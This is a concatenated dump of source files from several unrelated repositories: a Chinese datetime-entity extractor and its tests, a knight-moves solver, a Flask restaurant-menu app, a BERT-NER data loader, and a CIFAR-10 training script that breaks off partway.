", "") for (pattern, parse_code) in self.patterns.items(): matches = pattern.finditer(s_arabic_without_dot) for match in matches: if parse_code == 0: date_res = match.group(0) year = match.group("year") month = match.group("month") day = match.group("day") r.append( ( DateObject( now, date_res, parse_code, [1, 1, 1, 0, 0, 0], [0, None], [0, None], "Date", year=year, month=month, day=day, ), match.start(), match.end(), ) ) elif parse_code == 1: r.append( ( DateObject( now, match.group(0), parse_code, [1, 1, 0, 0, 0, 0], [0, None], [1, None], "DateRange", datetime(int(match.group(1)), int(match.group(2)), 1), duration=(0, 1, 0, 0), ), match.start(), match.end(), ) ) elif parse_code == 2: r.append( ( DateObject( now, match.group(0), parse_code, [1, 0, 0, 0, 0, 0], [0, None], [1, None], "DateRange", duration=(1, 0, 0, 0), year=(match.group(1), match.group(2)), ), match.start(), match.end(), ) ) elif parse_code == 3: r.append( ( DateObject( now, match.group(0), parse_code, [1, 0, 0, 0, 0, 0], [0, None], [1, None], "DateRange", datetime(int(match.group("year")), 1, 1), duration=(1, 0, 0, 0), ), match.start(), match.end(), ) ) elif parse_code == 
4: r.append( ( DateObject( now, match.group(0), parse_code, [0, 1, 0, 0, 0, 0], [1, None], [1, None], "DateRange", datetime(now.year, int(match.group(1)), 1), (1, 0, 0, 0), (0, 1, 0, 0), ), match.start(), match.end(), ) ) elif parse_code == 5: # 针对类似31号的问题,这里如果日期超过当月最大日,需要减少月份 period = (0, 1, 0, 0) try: base_time = datetime(now.year, now.month, int(match.group(1))) except ValueError as e: if e.args[0] == "day is out of range for month": # 报错出在小月,而每个小月前后都是大月 base_time = datetime( now.year, now.month - 1, int(match.group(1)) ) period = (0, 2, 0, 0) else: raise r.append( ( DateObject( now, match.group(0), parse_code, [0, 0, 1, 0, 0, 0], [1, None], [0, None], "Date", base_time, period, ), match.start(), match.end(), ) ) elif parse_code == 6: r.append( ( DateObject( now, match.group(0), parse_code, [0, 0, 0, 1, 1, 0], [None, 0], [None, 0], "Time", hour=(match.group(1), match.group(3)), minute=match.group(2), ), match.start(), match.end(), ) ) elif parse_code == 7: r.append( ( DateObject( now, match.group(0), parse_code, [0, 0, 0, 0, 1, 0], [None, 1], [None, 0], "Time", now.replace( minute=int(match.group(1).replace(" ", "")), second=0, microsecond=0, ), (0, 0, 0, 3600), ), match.start(), match.end(), ) ) elif parse_code == 8: r.append( ( DateObject( now, match.group(0), parse_code, [0, 0, 0, 1, 1, 0], [None, 0], [None, 0], "Time", hour=int(match.group(1)), minute=int(match.group(2).replace(" ", "")), ), match.start(), match.end(), ) ) elif parse_code == 9: r.append( ( DateObject( now, match.group(0), parse_code, [0, 0, 0, 0, 0, 1], [None, 1], [None, 0], "Time", now.replace( second=int(match.group(1).replace(" ", "")), microsecond=0, ), (0, 0, 0, 60), ), match.start(), match.end(), ) ) elif parse_code == 10: r.append( ( DateObject( now, match.group(0), parse_code, [1, 1, 1, 1, 1, 1], [0, None], [0, None], "Date", level="years", years=match.group(1), ), match.start(), match.end(), ) ) elif parse_code == 11: r.append( ( DateObject( now, match.group(0), parse_code, [1, 1, 1, 1, 1, 1], [0, None], [0, None], "Date", level="months", months=match.group(1), ), match.start(), match.end(), ) ) elif parse_code == 12: r.append( ( DateObject( now, match.group(0), parse_code, [1, 1, 1, 1, 1, 1], [0, None], [0, None], "Date", level="weeks", weeks=match.group(1), ), match.start(), match.end(), ) ) elif parse_code == 13: r.append( ( DateObject( now, match.group(0), parse_code, [1, 1, 1, 1, 1, 1], [0, 0], [0, 0], "Datetime", level="days", days=match.group(1), ), match.start(), match.end(), ) ) elif parse_code == 14: r.append( ( DateObject( now, match.group(0), parse_code, [1, 1, 1, 1, 1, 1], [0, 0], [0, 0], "Datetime", level="hours", hours=match.group(1), ), match.start(), match.end(), ) ) elif parse_code == 15: r.append( ( DateObject( now, match.group(0), parse_code, [1, 1, 1, 1, 1, 1], [0, 0], [0, 0], "Datetime", level="minutes", minutes=match.group(1), ), match.start(), match.end(), ) ) elif parse_code == 16: r.append( ( DateObject( now, match.group(0), parse_code, [1, 1, 1, 1, 1, 1], [0, 0], [0, 0], "Datetime", level="seconds", seconds=match.group(1), ), match.start(), match.end(), ) ) elif parse_code == 17: r.append( ( DateObject( now, match.group(0), parse_code, [1, 1, 1, 1, 1, 1], [0, None], [1, None], "DateRange", level="years", years=match.group(1), ), match.start(), match.end(), ) ) elif parse_code == 18: r.append( ( DateObject( now, match.group(0), parse_code, [1, 1, 1, 1, 1, 1], [0, None], [1, None], "DateRange", level="months", months=match.group(1), ), match.start(), match.end(), ) ) elif parse_code 
== 19: r.append( ( DateObject( now, match.group(0), parse_code, [1, 1, 1, 1, 1, 1], [0, None], [1, None], "DateRange", level="weeks", weeks=match.group(1), ), match.start(), match.end(), ) ) elif parse_code == 20: r.append( ( DateObject( now, match.group(0), parse_code, [1, 1, 1, 1, 1, 1], [0, 0], [0, 1], "DatetimeRange", level="days", days=match.group(1), ), match.start(), match.end(), ) ) elif parse_code == 21: r.append( ( DateObject( now, match.group(0), parse_code, [1, 1, 1, 1, 1, 1], [0, 0], [0, 1], "DatetimeRange", level="hours", hours=match.group(1), ), match.start(), match.end(), ) ) elif parse_code == 22: r.append( ( DateObject( now, match.group(0), parse_code, [1, 1, 1, 1, 1, 1], [0, 0], [0, 1], "DatetimeRange", level="minutes", minutes=match.group(1), ), match.start(), match.end(), ) ) elif parse_code == 23: r.append( ( DateObject( now, match.group(0), parse_code, [1, 1, 1, 1, 1, 1], [0, 0], [0, 1], "DatetimeRange", level="seconds", seconds=match.group(1), ), match.start(), match.end(), ) ) elif parse_code == 24: r.append( ( DateObject( now, match.group(0), parse_code, [1, 0, 0, 0, 0, 0], [0, None], [1, None], "DateRange", datetime(now.year, 1, 1), duration=(1, 0, 0, 0), relative=(match.group(1), match.group(2)), ), match.start(), match.end(), ) ) elif parse_code == 25: r.append( ( DateObject( now, match.group(0), parse_code, [1, 1, 0, 0, 0, 0], [0, None], [1, None], "DateRange", datetime(now.year, now.month, 1), duration=(0, 1, 0, 0), relative=match.group(1), ), match.start(), match.end(), ) ) elif parse_code == 26: r.append( ( DateObject( now, match.group(0), parse_code, [1, 1, 0, 0, 0, 0], [0, None], [1, None], "DateRange", duration=(0, 0, 7, 0), is_week=1, relative=(match.group(1), match.group(2)), ), match.start(), match.end(), ) ) elif parse_code == 27: r.append( ( DateObject( now, match.group(0), parse_code, [1, 1, 0, 0, 0, 0], [0, None], [1, None], "DateRange", duration=(0, 0, 2, 0), relative=match.group(1), ), match.start(), match.end(), ) ) elif parse_code == 28: r.append( ( DateObject( now, match.group(0), parse_code, [1, 1, 1, 0, 0, 0], [0, None], [0, None], "Date", relative=(match.group(1), match.group(2)), weekday=match.group(3), ), match.start(), match.end(), ) ) elif parse_code == 29: r.append( ( DateObject( now, match.group(0), parse_code, [1, 1, 1, 0, 0, 0], [0, None], [0, None], "Date", datetime(now.year, now.month, now.day), ), match.start(), match.end(), ) ) elif parse_code == 30: r.append( ( DateObject( now, match.group(0), parse_code, [0, 1, 1, 0, 0, 0], [1, None], [0, None], "Date", ), match.start(), match.end(), ) ) elif parse_code == 31: r.append( ( DateObject( now, match.group(0), parse_code, [0, 0, 0, 1, 0, 0], [None, 0], [None, 1], "TimeRange", is_specific_time=1, ), match.start(), match.end(), ) ) elif parse_code == 32: r.append( ( DateObject( now, match.group(0), parse_code, [0, 0, 0, 1, 0, 0], [None, 0], [None, 0], "Time", is_specific_time=1, ), match.start(), match.end(), ) ) elif parse_code == 33: r.append( ( DateObject( now, match.group(0), parse_code, [1, 1, 1, 1, 0, 0], [None, 0], [None, 1], "DatetimeRange", is_specific_time=1, ), match.start(), match.end(), ) ) elif parse_code == 34: r.append( ( DateObject( now, match.group(0), parse_code, [1, 1, 1, 1, 0, 0], [0, 0], [0, 1], "DatetimeRange", now.replace(minute=0, second=0, microsecond=0), duration=(0, 0, 0, 3600), ), match.start(), match.end(), ) ) elif parse_code == 35: r.append( ( DateObject( now, match.group(0), parse_code, [1, 1, 1, 1, 1, 0], [0, 0], [0, 1], "DatetimeRange", 
now.replace(second=0, microsecond=0), duration=(0, 0, 0, 60), relative=match.group(1), ), match.start(), match.end(), ) ) elif parse_code == 36: r.append( ( DateObject( now, match.group(0), parse_code, [1, 1, 1, 1, 1, 1], [0, 0], [0, 1], "DatetimeRange", now.replace(microsecond=0), duration=(0, 0, 0, 1), relative=match.group(1), ), match.start(), match.end(), ) ) elif parse_code == 37: r.append( ( DateObject( now, match.group(0), parse_code, [1, 1, 1, 1, 1, 1], [0, 0], [0, 0], "Datetime", now.replace(microsecond=0), ), match.start(), match.end(), ) ) elif (parse_code >= 38) and (parse_code <= 44): durations.append( ( Duration(match.group(0), parse_code, match.group(1)), match.start(), match.end(), ) ) elif parse_code == 45: r.append( ( DateObject( now, match.group(0), parse_code, [0, 0, 0, 1, 1, 0], [None, 0], [None, 0], "Time", hour=int(match.group(1)), minute=int(match.group(2)), second=match.group(3), ), match.start(), match.end(), ) ) elif parse_code == 46: r.append( ( DateObject( now, match.group(0), parse_code, [0, 1, 1, 0, 0, 0], [1, None], [0, None], "Date", datetime( now.year, int(match.group(1)), int(match.group(2)) ), ), match.start(), match.end(), ) ) r = remove_inclusion(r) for (date_object, _, _) in r: date_object.parse_input() for (duration, _, _) in durations: duration.parse_input() # 将表达连续时间子串尝试进行合并 if len(r) >= 2: i, j = 0, 1 while j < len(r): fst = r[i] snd = r[j] # 如果两个时间表达是连着的 if fst[2] == snd[1]: sum_date_object = fst[0] + snd[0] if sum_date_object: if sum_date_object == "Illegal": r.remove(r[j]) r.remove(r[i]) else: r[i] = (fst[0] + snd[0], fst[1], snd[2]) r.remove(r[j]) else: i += 1 j += 1 else: i += 1 j += 1 r += durations r = remove_inclusion(r) i = 0 # 将转换为阿拉伯数字的entity转换成中文数字的entity for (obj, start, end) in r: shift = 0 while i < len(replacement_relationship_without_dot): ( origin, _, _, now, start_, end_, ) = replacement_relationship_without_dot[i] if end_ <= end: if (start_ == start - 1) and (now[0] == " "): obj.entity = origin + obj.entity[end_ - start :] shift += len(origin) - len(now) + 1 i += 1 elif start_ >= start: obj.entity = ( obj.entity[: (start_ - start + shift)] + origin + obj.entity[(end_ - start + shift) :] ) shift += len(origin) - len(now) i += 1 else: i += 1 else: break if obj.parse_code == 2: obj.entity = "".join(obj.entity.split()) if i == len(replacement_relationship_without_dot): break date_objects = [] # 构造输出的数据结构 for (obj, _, _) in r: is_duration = type(obj) == Duration is_multivalue = isinstance(obj.value, list) if is_duration: datetime_level = [0, 0, 0, 0, 0, 1] date_type, is_range = "duration", True if is_multivalue: values = [{"value": None, "delta": v} for v in obj.value] else: values = [{"value": None, "delta": obj.value}] else: datetime_level = obj.datetime_level date_type, is_range = get_type(obj.is_range[0], obj.is_range[1]) if is_multivalue: values = [] for v in obj.value: value, delta = get_datetime_value(v) values.append({"value": value, "delta": delta}) else: value, delta = get_datetime_value(obj.value) values = [{"value": value, "delta": delta}] try: search_rtn = re.search(obj.entity, text) start_pos = search_rtn.start() end_pos = search_rtn.end() except AttributeError: # re.search could find None if some unexpected errors happened, # and this will cause AttributeError when try to call None's start() method raise else: date_objects.append( Datetime( **{ "entity": obj.entity, "start_pos": start_pos, "end_pos": end_pos, "type": date_type, "is_range": is_range, "is_multivalue": is_multivalue, "values": values, "datetime_level": 
datetime_level, } ) ) return date_objects date_extractor = ZHDatetimeExtractor() if __name__ == "__main__": num = 100 while True: print(date_extractor.parse(input())) ``` #### File: easy_wechat_reminder/ner/models.py ```python from datetime import datetime, timedelta from enum import Enum from typing import List, Optional, Union, Text from pydantic import BaseModel class Entity(BaseModel): entity: Text start_pos: int end_pos: int class Number(Entity): num: Union[int, float] class DatetimeTypeEnum(str, Enum): date = "date" datetime = "datetime" time = "time" duration = "duration" def __repr__(self): return f"DatetimeTypeEnum.{self.value}" class Datetime(Entity): class Value(BaseModel): value: Optional[datetime] delta: Optional[timedelta] type: DatetimeTypeEnum is_range: bool is_multivalue: bool datetime_level: List[int] values: List[Value] ``` #### File: easy_wechat_reminder/tests/test_ner_time.py ```python import pytest from datetime import datetime from utils import NerUtil, TimeUtil from typing import Union def ner_time_interactively(): ner = NerUtil() while True: print('-'*30) try: txt = input("date: ") job_type, next_run_time, period_type = ner.extract_time(txt) print(job_type.name) print(TimeUtil.timestamp2datetime(next_run_time)) print(period_type) except Exception as e: print(str(e)) # while True: # print("-" * 30) # try: # txt = input("number: ") # print(ner.extract_number(txt)) # except Exception as e: # print(str(e)) # def test_extract_schedule(mocker): d_wed = datetime.strptime("2021-07-07 15:00:00", "%Y-%m-%d %H:%M:%S") mocker.patch.object(TimeUtil, "now_datetime", lambda: d_wed) ner = NerUtil() def assert_one(text: str, d_time_str: str, e_type: Union[str, int]): timestamp = TimeUtil.datetime2timestamp(d_time_str) assert ner.extract_time(text) == ( timestamp, e_type, ), f"result: {ner.extract_time(text)}" # test monthly assert_one("每月三号下午六点", "2021-08-03 18:00:00", "monthly") assert_one("每月10号下午六点", "2021-07-10 18:00:00", "monthly") # test yearly assert_one("每年一月三号下午六点", "2022-01-03 18:00:00", "yearly") assert_one("每年七月10号下午六点", "2021-07-10 18:00:00", "yearly") # test weekly assert_one("每周三下午六点", "2021-07-07 18:00:00", "weekly") assert_one("每周三下午两点", "2021-07-14 14:00:00", "weekly") assert_one("每周二下午两点", "2021-07-13 14:00:00", "weekly") assert_one("每周四下午两点", "2021-07-08 14:00:00", "weekly") # test daily assert_one("每天下午两点", "2021-07-08 14:00:00", "daily") assert_one("每天下午四点", "2021-07-07 16:00:00", "daily") # test days assert_one("每3天", "2021-07-10 15:00:00", 3) if __name__ == "__main__": pytest.main([__file__]) # ner_time_interactively() ``` #### File: easy_wechat_reminder/tests/test_time_util.py ```python from utils import TimeUtil def test_time_util(): assert TimeUtil.seconds2date_str(15) == '15秒', TimeUtil.seconds2date_str(15) assert TimeUtil.seconds2date_str(61) == '1分1秒', TimeUtil.seconds2date_str(61) assert TimeUtil.seconds2date_str(3661) == '1时1分1秒', TimeUtil.seconds2date_str(3661) assert TimeUtil.seconds2date_str(90061) == '1天1时1分1秒', TimeUtil.seconds2date_str(90061) if __name__ == '__main__': test_time_util() ```
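`TimeUtil.seconds2date_str` comes from the project's `utils` package, which is not shown above; the snippet below is only a stand-in sketch written to satisfy the assertions in `test_time_util`, so the real helper may format edge cases (for example zero-valued middle units) differently.

```python
# Stand-in for utils.TimeUtil.seconds2date_str, written only to match the
# expectations asserted in test_time_util above; the real helper may differ.
def seconds2date_str(seconds: int) -> str:
    parts = []
    for unit_seconds, label in ((86400, "天"), (3600, "时"), (60, "分")):
        value, seconds = divmod(seconds, unit_seconds)
        if value or parts:
            parts.append(f"{value}{label}")
    parts.append(f"{seconds}秒")
    return "".join(parts)


assert seconds2date_str(15) == "15秒"
assert seconds2date_str(61) == "1分1秒"
assert seconds2date_str(3661) == "1时1分1秒"
assert seconds2date_str(90061) == "1天1时1分1秒"
```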
{ "source": "AAAshuibiao/AriZona-Half-N-Half", "score": 3 }
#### File: Tests/Knight/knight.py ```python class squareOccupied(Exception): pass class goalReached(Exception): def __init__(self, move): self.totalMoves = move super().__init__() class Knight(object): def __init__(self, moves = 0): self.moves = moves self.alive = True def check(self, x, y, map): if self.alive: if map[(x, y)].isGoal: raise goalReached(self.moves) for (xAdd, yAdd) in [(1, -2), (2, -1), (2, 1), (1, 2), (-1, 2), (-2, 1), (-2, -1), (-1, -2)]: try: self.move(map[x + xAdd, y + yAdd]) except squareOccupied: pass except KeyError: pass self.alive = False def move(self, square): if square.occupied: raise squareOccupied() square.occupied = Knight(self.moves + 1) class Square(object): def __init__(self, *pos): self.pos = pos self.occupied = None self.isGoal = False class Chessboard(object): def __init__(self): self.map = dict() self.mapTraverse("self.map[(x, y)] = Square(x, y)") def mapTraverse(self, code): for x in range(301): for y in range(301): exec(code) def calculate(self, start, goal): self.map[start].occupied = Knight() self.map[goal].isGoal = True try: while True: self.step() except goalReached as solution: print("the minimum move is: " + str(solution.totalMoves)) def step(self): self.mapTraverse("if self.map[(x, y)].occupied: self.map[(x, y)].occupied.check(x, y, self.map)") chessboard = Chessboard() chessboard.calculate((12, 17), (225, 230)) input() ```
{ "source": "AAauAAau/Restaurantmanager", "score": 3 }
#### File: Restaurantmanager/Restaurant/routes.py ```python from flask import render_template, url_for, flash, redirect,request from Restaurant import app,db from Restaurant.forms import RestaurantForm from Restaurant.model import Restaurant, MenuItem """ """ #JSON APIs to view Restaurant Information @app.route('/restaurant/<int:restaurant_id>/menu/JSON') def restaurantMenuJSON(restaurant_id): restaurant = sessihon.query(Restaurant).filter_by(id = restaurant_id).one() items = MenuItem.filter_by(restaurant_id = restaurant_id).all() return jsonify(MenuItems=[i.serialize for i in items]) @app.route('/restaurant/<int:restaurant_id>/menu/<int:menu_id>/JSON') def menuItemJSON(restaurant_id, menu_id): Menu_Item = MenuItem.query.filter_by(id = menu_id).one() return jsonify(Menu_Item = Menu_Item.serialize) @app.route('/restaurant/JSON') def restaurantsJSON(): restaurants = Restaurant.query.all() return jsonify(restaurants= [r.serialize for r in restaurants]) @app.route('/') @app.route('/restaurant/') def showRestaurants(): restaurants = Restaurant.query.order_by(Restaurant.name).all() return render_template('restaurants.html', restaurants = restaurants) #Create a new restaurant """ @app.route('/restaurant/new/', methods=['GET','POST']) def newRestaurant(): if request.method == 'POST': newRestaurant = Restaurant(name = request.form['name']) db.session.add(newRestaurant) flash('New Restaurant %s Successfully Created' % newRestaurant.name) db.session.commit() return redirect(url_for('showRestaurants')) else: return render_template('newRestaurant.html') """ @app.route("/restaurant/new/", methods=['GET', 'POST']) def newRestaurant(): form = RestaurantForm() if form.validate_on_submit(): newRestaurant = Restaurant(name=form.name.data) db.session.add(newRestaurant) db.session.commit() flash(flash('New Restaurant %s Successfully Created' % form.name.data), 'success') return redirect(url_for('showRestaurants')) return render_template('newRestaurant.html', title='New Restaurant', form=form) #Edit a restaurant @app.route('/restaurant/<int:restaurant_id>/edit/', methods = ['GET', 'POST']) def editRestaurant(restaurant_id): editedRestaurant = Restaurant.query.filter_by(id = restaurant_id).one() if request.method == 'POST': if request.form['name']: editedRestaurant.name = request.form['name'] flash('Restaurant Successfully Edited %s' % editedRestaurant.name) return redirect(url_for('showRestaurants')) else: return render_template('editRestaurant.html', restaurant = editedRestaurant) #Delete a restaurant @app.route('/restaurant/<int:restaurant_id>/delete/', methods = ['GET','POST']) def deleteRestaurant(restaurant_id): restaurantToDelete = Restaurant.queryfilter_by(id = restaurant_id).one() if request.method == 'POST': db.session.delete(restaurantToDelete) flash('%s Successfully Deleted' % restaurantToDelete.name) db.session.commit() return redirect(url_for('showRestaurants', restaurant_id = restaurant_id)) else: return render_template('deleteRestaurant.html',restaurant = restaurantToDelete) #Show a restaurant menu @app.route('/restaurant/<int:restaurant_id>/') @app.route('/restaurant/<int:restaurant_id>/menu/') def showMenu(restaurant_id): restaurant =Restaurant.query.filter_by(id = restaurant_id).one() items = db.session.query(MenuItem).filter_by(restaurant_id = restaurant_id).all() return render_template('menu.html', items = items, restaurant = restaurant) #Create a new menu item @app.route('/restaurant/<int:restaurant_id>/menu/new/',methods=['GET','POST']) def newMenuItem(restaurant_id): restaurant = 
Restaurant.query.filter_by(id = restaurant_id).one() if request.method == 'POST': newItem = MenuItem(name = request.form['name'], description = request.form['description'], price = request.form['price'], course = request.form['course'], restaurant_id = restaurant_id) db.session.add(newItem) db.session.commit() flash('New Menu %s Item Successfully Created' % (newItem.name)) return redirect(url_for('showMenu', restaurant_id = restaurant_id)) else: return render_template('newmenuitem.html', restaurant_id = restaurant_id) #Edit a menu item @app.route('/restaurant/<int:restaurant_id>/menu/<int:menu_id>/edit', methods=['GET','POST']) def editMenuItem(restaurant_id, menu_id): editedItem = MenuItem.query.filter_by(id = menu_id).one() restaurant = Restaurant.query.filter_by(id = restaurant_id).one() if request.method == 'POST': if request.form['name']: editedItem.name = request.form['name'] if request.form['description']: editedItem.description = request.form['description'] if request.form['price']: editedItem.price = request.form['price'] if request.form['course']: editedItem.course = request.form['course'] db.session.add(editedItem) db.session.commit() flash('Menu Item Successfully Edited') return redirect(url_for('showMenu', restaurant_id = restaurant_id)) else: return render_template('editmenuitem.html', restaurant_id = restaurant_id, menu_id = menu_id, item = editedItem) #Delete a menu item @app.route('/restaurant/<int:restaurant_id>/menu/<int:menu_id>/delete', methods = ['GET','POST']) def deleteMenuItem(restaurant_id,menu_id): restaurant = Restaurant.query.filter_by(id = restaurant_id).one() itemToDelete = MenuItem.query.filter_by(id = menu_id).one() if request.method == 'POST': db.session.delete(itemToDelete) db.session.commit() flash('Menu Item Successfully Deleted') return redirect(url_for('showMenu', restaurant_id = restaurant_id)) else: return render_template('deleteMenuItem.html', item = itemToDelete) ```
{ "source": "AAAves/BERT-NER", "score": 3 }
#### File: AAAves/BERT-NER/data_loader.py ```python import os import torch import utils import random import numpy as np from transformers import BertTokenizer class DataLoader(object): def __init__(self, data_dir, bert_class, params, token_pad_idx=0, tag_pad_idx=-1): self.data_dir = data_dir self.batch_size = params.batch_size self.max_len = params.max_len self.device = params.device self.seed = params.seed self.token_pad_idx = token_pad_idx self.tag_pad_idx = tag_pad_idx tags = self.load_tags() self.tag2idx = {tag: idx for idx, tag in enumerate(tags)} self.idx2tag = {idx: tag for idx, tag in enumerate(tags)} params.tag2idx = self.tag2idx params.idx2tag = self.idx2tag self.tokenizer = BertTokenizer.from_pretrained(bert_class, do_lower_case=False) def load_tags(self): tags = [] file_path = os.path.join(self.data_dir, 'tags.txt') with open(file_path, 'r') as file: for tag in file: tags.append(tag.strip()) return tags def load_sentences_tags(self, sentences_file, tags_file, d): """Loads sentences and tags from their corresponding files. Maps tokens and tags to their indices and stores them in the provided dict d. """ sentences = [] tags = [] with open(sentences_file, 'r') as file: for line in file: # replace each token by its index tokens = line.strip().split(' ') subwords = list(map(self.tokenizer.tokenize, tokens)) subword_lengths = list(map(len, subwords)) subwords = ['CLS'] + [item for indices in subwords for item in indices] token_start_idxs = 1 + np.cumsum([0] + subword_lengths[:-1]) sentences.append((self.tokenizer.convert_tokens_to_ids(subwords),token_start_idxs)) if tags_file != None: with open(tags_file, 'r') as file: for line in file: # replace each tag by its index tag_seq = [self.tag2idx.get(tag) for tag in line.strip().split(' ')] tags.append(tag_seq) # checks to ensure there is a tag for each token assert len(sentences) == len(tags) for i in range(len(sentences)): assert len(tags[i]) == len(sentences[i][-1]) d['tags'] = tags # storing sentences and tags in dict d d['data'] = sentences d['size'] = len(sentences) def load_data(self, data_type): """Loads the data for each type in types from data_dir. Args: data_type: (str) has one of 'train', 'val', 'test' depending on which data is required. Returns: data: (dict) contains the data with tags for each type in types. """ data = {} if data_type in ['train', 'val', 'test']: print('Loading ' + data_type) sentences_file = os.path.join(self.data_dir, data_type, 'sentences.txt') tags_path = os.path.join(self.data_dir, data_type, 'tags.txt') self.load_sentences_tags(sentences_file, tags_path, data) elif data_type == 'interactive': sentences_file = os.path.join(self.data_dir, data_type, 'sentences.txt') self.load_sentences_tags(sentences_file, tags_file=None, d=data) else: raise ValueError("data type not in ['train', 'val', 'test']") return data def data_iterator(self, data, shuffle=False): """Returns a generator that yields batches data with tags. 
Args: data: (dict) contains data which has keys 'data', 'tags' and 'size' shuffle: (bool) whether the data should be shuffled Yields: batch_data: (tensor) shape: (batch_size, max_len) batch_tags: (tensor) shape: (batch_size, max_len) """ # make a list that decides the order in which we go over the data- this avoids explicit shuffling of data order = list(range(data['size'])) if shuffle: random.seed(self.seed) random.shuffle(order) interMode = False if 'tags' in data else True if data['size'] % self.batch_size == 0: BATCH_NUM = data['size']//self.batch_size else: BATCH_NUM = data['size']//self.batch_size + 1 # one pass over data for i in range(BATCH_NUM): # fetch sentences and tags if i * self.batch_size < data['size'] < (i+1) * self.batch_size: sentences = [data['data'][idx] for idx in order[i*self.batch_size:]] if not interMode: tags = [data['tags'][idx] for idx in order[i*self.batch_size:]] else: sentences = [data['data'][idx] for idx in order[i*self.batch_size:(i+1)*self.batch_size]] if not interMode: tags = [data['tags'][idx] for idx in order[i*self.batch_size:(i+1)*self.batch_size]] # batch length batch_len = len(sentences) # compute length of longest sentence in batch batch_max_subwords_len = max([len(s[0]) for s in sentences]) max_subwords_len = min(batch_max_subwords_len, self.max_len) max_token_len = 0 # prepare a numpy array with the data, initialising the data with pad_idx batch_data = self.token_pad_idx * np.ones((batch_len, max_subwords_len)) batch_token_starts = [] # copy the data to the numpy array for j in range(batch_len): cur_subwords_len = len(sentences[j][0]) if cur_subwords_len <= max_subwords_len: batch_data[j][:cur_subwords_len] = sentences[j][0] else: batch_data[j] = sentences[j][0][:max_subwords_len] token_start_idx = sentences[j][-1] token_starts = np.zeros(max_subwords_len) token_starts[[idx for idx in token_start_idx if idx < max_subwords_len]] = 1 batch_token_starts.append(token_starts) max_token_len = max(int(sum(token_starts)), max_token_len) if not interMode: batch_tags = self.tag_pad_idx * np.ones((batch_len, max_token_len)) for j in range(batch_len): cur_tags_len = len(tags[j]) if cur_tags_len <= max_token_len: batch_tags[j][:cur_tags_len] = tags[j] else: batch_tags[j] = tags[j][:max_token_len] # since all data are indices, we convert them to torch LongTensors batch_data = torch.tensor(batch_data, dtype=torch.long) batch_token_starts = torch.tensor(batch_token_starts, dtype=torch.long) if not interMode: batch_tags = torch.tensor(batch_tags, dtype=torch.long) # shift tensors to GPU if available batch_data, batch_token_starts = batch_data.to(self.device), batch_token_starts.to(self.device) if not interMode: batch_tags = batch_tags.to(self.device) yield batch_data, batch_token_starts, batch_tags else: yield batch_data, batch_token_starts ```
{ "source": "AAAves/pytorch-cifar", "score": 3 }
#### File: AAAves/pytorch-cifar/main.py ```python import torch import torch.nn as nn import torch.optim as optim import torch.nn.functional as F from torch.optim import lr_scheduler import torch.backends.cudnn as cudnn import torchvision import torchvision.transforms as transforms import os import argparse import numpy as np from models import * from utils import progress_bar import logging #TODO 调整模型参数刷到sota的结果 #TODO 目标model:resnet parser = argparse.ArgumentParser(description='PyTorch CIFAR10 Training') parser.add_argument('--lr', default=0.1, type=float, help='learning rate') parser.add_argument('--resume', '-r', action='store_true', help='resume from checkpoint') parser.add_argument('--model', default="resnet18", type=str, help='choose which model to use') parser.add_argument('--seed', default=1234, type=int, help='seed and experiment code') parser.add_argument('--nepochs', default=300, type=int, help='how many epochs to run') args = parser.parse_args() device = 'cuda' if torch.cuda.is_available() else 'cpu' best_acc = 0 # best test accuracy start_epoch = 0 # start from epoch 0 or last checkpoint epoch # experiment result if not os.path.exists('./experiment/'+args.model): os.makedirs('./experiment/'+args.model) # logger logger = logging.getLogger(__name__) logger.setLevel(level=logging.INFO) logfile = args.model + '_' + str(args.seed) + '_' + str(args.nepochs) handler = logging.FileHandler('./experiment/' +args.model + '/' + logfile + '.txt') formatter = logging.Formatter('%(asctime)s - %(name)s - %(message)s') handler.setFormatter(formatter) # 屏幕输出控制 console = logging.StreamHandler() console.setLevel(logging.INFO) logger.addHandler(handler) logger.addHandler(console) # 记录实验数据 logger.info("---------experiment setting------------") logger.info("learning rate: {}".format(args.lr)) logger.info("model:" + args.model) logger.info("Seed: {}".format(args.seed)) logger.info("nepochs: {}".format(args.nepochs)) # set seed np.random.seed(args.seed) torch.manual_seed(args.seed) torch.cuda.manual_seed(args.seed) # Data print('==> Preparing data..') transform_train = transforms.Compose([ transforms.RandomCrop(32, padding=4), transforms.RandomHorizontalFlip(), transforms.ToTensor(), transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)), ]) transform_test = transforms.Compose([ transforms.ToTensor(), transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)), ]) trainset = torchvision.datasets.CIFAR10( root='./data', train=True, download=True, transform=transform_train) trainloader = torch.utils.data.DataLoader( trainset, batch_size=128, shuffle=True, num_workers=2) testset = torchvision.datasets.CIFAR10( root='./data', train=False, download=True, transform=transform_test) testloader = torch.utils.data.DataLoader( testset, batch_size=100, shuffle=False, num_workers=2) classes = ('plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck') # Model print('==> Building model..') # net = VGG('VGG19') if args.model == "resnet18": net = ResNet18() if args.model == "resnet101": net = ResNet101() # net = PreActResNet18() # net = GoogLeNet() # net = DenseNet121() # net = ResNeXt29_2x64d() # net = MobileNet() # net = MobileNetV2() # net = DPN92() # net = ShuffleNetG2() # net = SENet18() # net = ShuffleNetV2(1) # net = EfficientNetB0() # net = RegNetX_200MF() net = net.to(device) if device == 'cuda': net = torch.nn.DataParallel(net) cudnn.benchmark = True if args.resume: # Load checkpoint. 
print('==> Resuming from checkpoint..') assert os.path.isdir('checkpoint'), 'Error: no checkpoint directory found!' checkpoint = torch.load('./checkpoint/ckpt.pth') net.load_state_dict(checkpoint['net']) best_acc = checkpoint['acc'] start_epoch = checkpoint['epoch'] criterion = nn.CrossEntropyLoss() optimizer = optim.SGD(net.parameters(), lr=args.lr, momentum=0.9, weight_decay=5e-4) scheduler = lr_scheduler.StepLR(optimizer, step_size=150, gamma=0.1) # scheduler = MultiStepLR(optimizer_fn, milestones=[150, 225, 270], gamma=0.1) # Training def train(epoch): # print('\nEpoch: %d' % epoch) net.train() train_loss = 0 correct = 0 total = 0 for batch_idx, (inputs, targets) in enumerate(trainloader): inputs, targets = inputs.to(device), targets.to(device) optimizer.zero_grad() outputs = net(inputs) loss = criterion(outputs, targets) loss.backward() optimizer.step() train_loss += loss.item() _, predicted = outputs.max(1) total += targets.size(0) correct += predicted.eq(targets).sum().item() # progress_bar(batch_idx, len(trainloader), 'Loss: %.3f | Acc: %.3f%% (%d/%d)' # % (train_loss/(batch_idx+1), 100.*correct/total, correct, total)) if epoch%10 == 0: 